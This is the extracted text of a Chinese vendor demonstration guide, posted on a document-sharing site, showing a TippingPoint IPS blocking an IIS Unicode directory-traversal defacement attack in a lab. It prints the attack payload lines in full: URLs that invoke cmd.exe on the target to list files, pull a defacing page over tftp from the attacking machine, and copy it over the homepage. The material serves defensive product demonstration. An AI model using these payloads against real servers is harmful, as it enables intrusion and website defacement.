TippingPoint对篡改主页攻击防御功能演示操作指导.pdfVIP

TippingPoint对篡改主页攻击防御功能演示操作指导.pdf

  1. 1、本文档共7页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
TippingPoint对篡改主页攻击防御的功能演示 操作指导 安全产品 赵彪 04708 组网需求: 演示TippingPoint对篡改主页攻击防御的功能。 组网图 TippingPoint1200:TOS Version :519,Digital Vaccine :720 ; PC1:WindowsXP、可执行程序 simpleattack.exe(包括一个简单的配置脚 本)、tftp服务器; PC2:没有打补丁的Windows2000Server,安装有IIS服务; PC3:WindowsXP,管理TippingPoint1200。 测试步骤 1、在不加入TippingPoint1200时,验证Unicode攻击: 步骤1:配置PC2 : 将Google.files和Google.html拷到PC2的Inetpub\wwwroot下,这时IE 可连上去访问; 设置PC2上IIS的默认Web站点的文档的主页面为Google.html; 1 IIS的默认Web站点的主目录的执行许可要设成:脚本和可执行程 序 对NTFS文件系统,需要给wwwroot目录的安全标签页进行修改,改成 Everyone有修改和写入的权限;(另外,wwwroot目录本身的属性肯定要 关注一下,如果只读,肯定需要去掉只读属性;); 2 步骤2 :在PC 1 上访问PC2 的Web 服务: 步骤3 : PC2 的配置: 根据目标机的IP地址修改attack/目录下的attackcmd.txt文件;另外, 3 攻击机里要有tftp服务器程序,还有,在攻击工具的目录下有黑网页,要 被目标机下载;这样就可以黑掉网页了。 attackcmd.txt文件内容: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+ /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp+-i+ +get+goog le.html /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+d:\inetpub\scripts\googl e.html+d:\inetpub\wwwroot\Google.html / 步骤4 :在PC 1 上用simpleattack.exe工具攻击PC2 : 步骤5:PC2 被攻击后,网页内容被修改: 4 2 、加入TippingPoint1200后,验证Unicode攻击: 步骤1:缺省情况下,过滤器1095启用 步骤2 :PC 1 攻击PC2 ,由于经过了TP 防御,攻击失败 5 步骤3 :查看Block日志 步骤4 :查看攻击报告 6 演示关键点 略。 7

文档评论(0)

kehan123 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档